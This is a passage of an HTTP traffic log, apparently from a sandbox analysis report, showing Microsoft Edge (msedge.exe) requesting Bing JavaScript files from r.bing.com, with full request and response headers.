Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144331.f0981ff
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/V5dpoD3fjhPtv-hIh3ssEsOr5_M.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/V5dpoD3fjhPtv-hIh3ssEsOr5_M.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 302
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: EjYB8vze75Y5yL/vOyaplg==
Last-Modified: Tue, 24 Sep 2024 06:29:12 GMT
ETag: 0x8DCDC6234635DEB
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b5ddaac5-901e-005b-77d6-15edec000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=276632
Expires: Tue, 08 Oct 2024 20:56:03 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144331.f09835e
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/MHGveHjpT20MyFEdoL1KWdpZGoU.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/MHGveHjpT20MyFEdoL1KWdpZGoU.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 149
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: 0yRJLjnLGdkYMW/+ABD5Lw==
Last-Modified: Tue, 24 Sep 2024 06:15:10 GMT
ETag: 0x8DCDC603EDAFF15
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8a2a5976-801e-0029-6704-179cd2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=406307
Expires: Thu, 10 Oct 2024 08:57:18 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144331.f09851c
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/XpyaFPNakGOwlPXoOWhSNZDWjDU.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/XpyaFPNakGOwlPXoOWhSNZDWjDU.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 162
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: nHbtRiKzAW4DxhW4zhKJGw==
Last-Modified: Tue, 24 Sep 2024 06:33:01 GMT
ETag: 0x8DCDC62BD43783A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 92ebaed1-601e-0067-4fa3-145937000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=144892
Expires: Mon, 07 Oct 2024 08:20:23 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144331.f09866a
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/_cQCYzUIUDtiKJi2Mubb5vkdlxs.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/_cQCYzUIUDtiKJi2Mubb5vkdlxs.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Last-Modified: Mon, 22 Jul 2024 21:39:04 GMT
ETag: 0x8DCAA96B5AE1E74
Content-Type: text/javascript; charset=utf-8
Content-MD5: BqDy58++KpP6pd5VjlogiA==
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6f48b9bf-401e-0060-5a1e-107833000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Content-Encoding: gzip
Content-Length: 2590
Cache-Control: public, no-transform, max-age=36803
Expires: Sun, 06 Oct 2024 02:18:54 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144331.f098780
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rs/6s/lA/nj/pxzfjFIjWTDQikh0A5aT_cguYyc.js?or=w

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rs/6s/lA/nj/pxzfjFIjWTDQikh0A5aT_cguYyc.js?or=w HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 389
Content-Type: application/x-javascript; charset=utf-8
Server: Kestrel
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
Content-Encoding: gzip
Last-Modified: Tue, 16 Aug 2022 23:47:39 GMT
X-EventID: 66e2ce70443f4c56850b8bcf022ee450
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
X-AS-InstrumentationOptions: AppServerLoggingMaster=1
X-AS-MACHINENAME: DUBEEAP0000E016
X-AS-SuppressSetCookie: 1
Content-Security-Policy-Report-Only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-09lTFFot9Wx8mF59QsnSNBWyh7RrMRG78bQ4j3feFAE='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
Cache-Control: public, max-age=394711
Expires: Thu, 10 Oct 2024 05:44:02 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144331.f098897
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/8CgcSSLayxEVUBf0swP_bQGMId8.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/8CgcSSLayxEVUBf0swP_bQGMId8.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 156
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: 0ApKmxnWdlgJ/r3VvxbmFQ==
Last-Modified: Tue, 24 Sep 2024 05:52:56 GMT
ETag: 0x8DCDC5D2377F40E
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0fa8f8a5-901e-0036-4817-1647c2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=304240
Expires: Wed, 09 Oct 2024 04:36:11 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144331.f0989bf
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/9cuwOQ_qE7qTGKohzrf_gIjTlPI.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/9cuwOQ_qE7qTGKohzrf_gIjTlPI.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 1532
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: FXbNzL5WiMdS7y/N9ZEDfg==
Last-Modified: Tue, 24 Sep 2024 05:55:11 GMT
ETag: 0x8DCDC5D73F196CA
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3ead00de-601e-0028-06ff-159d2f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=294058
Expires: Wed, 09 Oct 2024 01:46:30 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144332.f098ae9
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/K_V1CARn2Q2lTs5njJKUvUkHyi4.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/K_V1CARn2Q2lTs5njJKUvUkHyi4.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Content-MD5: zk7Mu+IZ+1Afv84KFZt8XQ==
Last-Modified: Tue, 06 Jun 2023 10:30:54 GMT
ETag: 0x8DB66791BAB4052
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 237e268e-b01e-0029-11dd-043ad8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Content-Encoding: gzip
Content-Length: 160
Cache-Control: public, no-transform, max-age=100477
Expires: Sun, 06 Oct 2024 20:00:09 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144332.f098bc7
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/uceaWoHkRefVM5EK1cFT2TcyRm0.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/uceaWoHkRefVM5EK1cFT2TcyRm0.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 420
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: jo9OjDEVHQbXwUo+1GLIXA==
Last-Modified: Tue, 24 Sep 2024 07:09:17 GMT
ETag: 0x8DCDC67CE093DD9
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 623f5107-d01e-0018-510f-15c705000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=191233
Expires: Mon, 07 Oct 2024 21:12:45 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144332.f098ccc
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/ydDuUFvQrnTEDpvE14Ya7abrPGk.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/ydDuUFvQrnTEDpvE14Ya7abrPGk.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 1050
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: 4a3fKAPxT8n6JSY4NlwK9Q==
Last-Modified: Thu, 11 Jan 2024 22:51:23 GMT
ETag: 0x8DC12F7D61A2E2B
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8145f290-e01e-008d-721a-ff337e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=43496
Expires: Sun, 06 Oct 2024 04:10:28 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144332.f098dcb
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/OO7WGtZfHYNIDiCauwJaf5PGmxw.gz.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/OO7WGtZfHYNIDiCauwJaf5PGmxw.gz.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 1490
Content-Type: text/javascript; charset=utf-8
Content-Encoding: gzip
Content-MD5: 36/ok8yBeadr0YwHNUAY3A==
Last-Modified: Tue, 24 Sep 2024 06:18:34 GMT
ETag: 0x8DCDC60B8646A2E
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a7ac3f28-c01e-0048-5ad5-14d80d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=166071
Expires: Mon, 07 Oct 2024 14:13:24 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f098eea
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/lhnOsb1440cRnpHJLM_raa23Jj8.gz.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/lhnOsb1440cRnpHJLM_raa23Jj8.gz.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 726
Content-Type: text/javascript; charset=utf-8
Content-Encoding: gzip
Content-MD5: Fhszh4BaAIXsObhvPQyPbg==
Last-Modified: Sat, 07 Oct 2023 21:03:17 GMT
ETag: 0x8DBC778D46F5FC4
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d95c0d6f-f01e-004a-4740-14a723000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
Cache-Control: public, no-transform, max-age=102255
Expires: Sun, 06 Oct 2024 20:29:48 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f099711
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/6mZmj1db42G_jniFgdT7MCvBgyA.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/6mZmj1db42G_jniFgdT7MCvBgyA.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 375
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: kdgVpI0X+oWcnOv0ZCUuIA==
Last-Modified: Tue, 24 Sep 2024 05:51:04 GMT
ETag: 0x8DCDC5CE09E00D2
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 24a5e4a3-801e-0029-2ae5-149cd2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=173010
Expires: Mon, 07 Oct 2024 16:09:20 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144350.f09985e
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/zlfm-hC70pZAs62UVTTl3KShKOE.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/zlfm-hC70pZAs62UVTTl3KShKOE.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Content-MD5: wMjND6gwy3LKsXBo8Ww74w==
Last-Modified: Tue, 24 Sep 2024 07:16:51 GMT
ETag: 0x8DCDC68DCA5DDA0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ce25302a-c01e-002e-0401-156a57000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Content-Encoding: gzip
Content-Length: 481
Cache-Control: public, no-transform, max-age=184801
Expires: Mon, 07 Oct 2024 19:25:51 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144350.f0a270b
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/FIrq4n7XJcH-bxJlHvalz0nETAA.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/FIrq4n7XJcH-bxJlHvalz0nETAA.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 105
Content-Type: application/x-javascript; charset=utf-8
Content-Encoding: br
Content-MD5: oglWtvyLTVv5YmVMX1J+nQ==
Last-Modified: Wed, 17 Aug 2022 05:32:18 GMT
ETag: 0x8DA8011D9AC4362
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f1533a5b-001e-0024-204f-ea16f1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=53879
Expires: Sun, 06 Oct 2024 07:03:28 GMT
